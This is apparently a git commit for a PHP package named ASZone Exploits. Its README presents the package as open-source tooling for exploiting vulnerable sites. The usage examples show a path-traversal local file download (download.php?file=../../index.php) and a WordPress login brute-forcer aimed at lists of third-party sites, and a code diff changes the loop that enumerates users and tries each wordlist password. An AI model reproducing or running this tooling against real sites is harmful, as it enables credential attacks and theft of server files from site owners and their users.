init project

Author: lenonleite

README.md

@@ -1 +1,43 @@
-# exploits
+# ASZone - Exploits
+
+> ASZone - Exploits - Local File Download
+> ASZone - Exploits - Brute Force in WordPress
+
+### Beta
+> Reading Static File is a open source package for exploting vulnerables sites
+
+## Instalation
+
+The recommended way to install PHP Avenger is through
+[Composer](http://getcomposer.org).
+
+```bash
+# Install Composer
+curl -sS https://getcomposer.org/installer | php
+
+
+## Basic Usage Local File Download
+```bash
+$command=array();
+$crawler = new DownloadByLocalFileDownload($command);
+$url="http://www.xxxx.com/download.php?file=../../index.php";
+$crawler->getAllFiles($url);
+
+```
+
+## Basic Usage Brute Force in WordPress
+```bash
+$command=array();
+$btwp = new BruteForceWordPress($command);
+
+$listSite[]='http://www.site1.org.br/wp-login.php';
+$listSite[]='http://site2.com.br/wp-login.php';
+$btwp->execute($listSite);
+
+```
+
+## Help and docs
+* [Documentation](http://phpavenger.aszone.com.br).
+* [Examples](http://phpavenger.aszone.com.br/examples).
+* [Videos](http://youtube.com/aszone).
+* [Steakoverflow](http://phpavenger.aszone.com.br).

composer.json

@@ -23,7 +23,8 @@
     "symfony/dom-crawler":"~2.8",
     "symfony/css-selector":"2.8",
     "aszone/fakeheaders": "~0.1",
-    "aszone/hacking": "~0.2"
+    "aszone/hacking": "~0.2",
+    "lenonleite/hacking-analyze-static-files": "~0.2"
   },
   "autoload": {
     "psr-4": {

src/BruteForceWordPress.php

@@ -50,9 +50,11 @@ private function defaultEnterData()
     public function execute($sites= array()){
 
         $wordlists = $this->getWordListInArray();
+        $wp = new WordPress();
         foreach($sites as $site){
-            $wp = new WordPress();
-            $users=$wp->getUsers();
+
+            $wp->setTarget($site);
+            $users = $wp->getUsers();
             foreach ($users as $user){
                 foreach ( $wordlists as $password) {
                     $this->sendDataToLoginWordPress($user,$password,$site);